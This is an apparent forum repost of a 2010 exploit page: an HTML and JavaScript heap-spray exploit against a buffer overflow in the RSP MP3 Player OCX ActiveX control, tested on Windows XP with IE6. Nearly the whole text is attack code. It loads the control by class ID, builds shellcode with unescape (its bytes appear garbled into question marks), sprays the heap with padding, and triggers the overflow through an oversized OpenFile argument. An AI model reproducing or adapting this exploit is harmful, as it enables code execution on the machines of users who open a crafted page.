RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)

Dragos · August 19, 2010

<html>
<br></br>
<br>.  .     .    \  / </br>
<br>|\/| _. _|  ** ><  </br>
<br>|  |(_](_]  ||/  \ </br>
<br>          ._|      </br>
<br></br>
<br>RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)</br>
<br>By : MadjiX , Dz8(a)Hotmail.com</br>
<br>Discovered by Blake: [url=http://www.exploit-db.com/exploits/14309/]RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow[/url]
<br>Greetings: His0k4 , Bibi-info , The g0bl!n (y) , sec4ever.com</br>
<br>Tested on Windows Xp Sp3 (Fr),with IE6</br>
<object classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687' id='target' ></object>
<script>
sh = unescape('%uc931???????'+
                    '??????????'+
                    '?????????'+
                    '??????????'+
                    '??????????'+
                    '??????????'+
                    '??????????'+
                    '??????????');

n=unescape('??');
h = 20;
s= h + sh.length;
while(n.length<s) n+=n;
f=n.substring(0,s);
b=n.substring(0,n.length-s);
while(b.length+s<0x40000) b=b+b+f;
memory=new Array();
for( counter=0; counter<250; counter++) memory[counter]= b + sh;
ret='';
for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a");

target.OpenFile(ret);

</script>
</html>

Sign In

RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)

Recommended Posts

Dragos

Join the conversation

Browse

Activity

Pages